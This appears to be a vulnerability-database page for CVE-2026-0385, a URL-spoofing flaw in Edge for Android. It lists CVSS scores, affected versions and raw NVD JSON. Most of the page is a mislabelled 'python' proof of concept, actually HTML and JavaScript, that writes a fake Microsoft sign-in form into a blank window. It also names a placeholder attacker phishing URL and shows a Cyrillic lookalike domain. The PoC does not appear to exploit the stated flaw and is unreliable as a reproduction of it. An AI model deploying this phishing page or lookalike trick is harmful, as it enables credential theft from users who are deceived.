CVE-2026-0385

Description

Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:*:android:*:* - VULNERABLE

Microsoft Edge (Chromium-based) for Android < 最新版本

所有基于Chromium内核的Android浏览器可能受影响

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-0385 PoC - URL Spoofing for Microsoft Edge Android
// This PoC demonstrates address bar spoofing vulnerability

<!DOCTYPE html>
<html>
<head>
    <title>URL Spoofing PoC - CVE-2026-0385</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .warning { color: red; font-weight: bold; }
        .info { background: #f0f0f0; padding: 10px; margin: 10px 0; }
    </style>
</head>
<body>
    <h1>CVE-2026-0385 URL Spoofing Demo</h1>
    <p class="warning">⚠️ This is for educational and testing purposes only!</p>
    
    <div class="info">
        <p><strong>Actual URL:</strong> <span id="actualUrl"></span></p>
        <p><strong>Displayed URL:</strong> <span id="displayedUrl"></span></p>
    </div>
    
    <button onclick="performSpoof()">Start Spoof Attack Demo</button>
    
    <script>
        // Target URL to display in address bar (fake URL)
        const FAKE_URL = 'https://www.microsoft.com/';
        // Actual malicious URL
        const MALICIOUS_URL = 'https://attacker-controlled-site.com/phishing';
        
        function performSpoof() {
            // Method 1: Using about:blank and history manipulation
            const newWindow = window.open('about:blank', '_blank');
            const doc = newWindow.document;
            doc.open();
            doc.write(`
                <html>
                <head>
                    <title>Fake Microsoft Login</title>
                    <style>
                        body { font-family: Arial; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background: #0078d4; }
                        .login-box { background: white; padding: 40px; border-radius: 8px; text-align: center; }
                        input { display: block; width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; }
                        button { background: #0078d4; color: white; padding: 12px 24px; border: none; cursor: pointer; }
                    </style>
                </head>
                <body>
                    <div class="login-box">
                        <h2>Microsoft Account</h2>
                        <p>Sign in to continue</p>
                        <form>
                            <input type="email" placeholder="Email or phone">
                            <input type="password" placeholder="Password">
                            <button type="submit">Sign in</button>
                        </form>
                    </div>
                </body>
                </html>
            `);
            doc.close();
            
            // The address bar will show about:blank or may show a different URL
            // depending on Edge's implementation
            
            document.getElementById('actualUrl').textContent = window.location.href;
            document.getElementById('displayedUrl').textContent = FAKE_URL;
            
            alert('Spoofing demonstration complete.\n' +
                  'Note: Address bar may show misleading URL in vulnerable versions.');
        }
        
        // Method 2: URL obfuscation using special characters
        function urlObfuscation() {
            // Example: Using similar-looking Unicode characters
            const fakeMicrosoft = 'https://www.mіcrosoft.com'; // Cyrillic 'і' instead of 'i'
            console.log('Obfuscated URL:', fakeMicrosoft);
        }
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0385
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0385
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0385/
[4] VulDB https://vuldb.com/cve/CVE-2026-0385
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0385

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0385", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:06.797", "lastModified": "2026-04-07T21:17:00.757", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability"}, {"lang": "es", "value": "Vulnerabilidad de suplantación de Microsoft Edge (basado en Chromium) para Android"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:*:android:*:*", "versionEndExcluding": "146.0.3856.59", "matchCriteriaId": "87AE5657-6D4C-4162-8744-C83D6CAA6E30"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0385", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}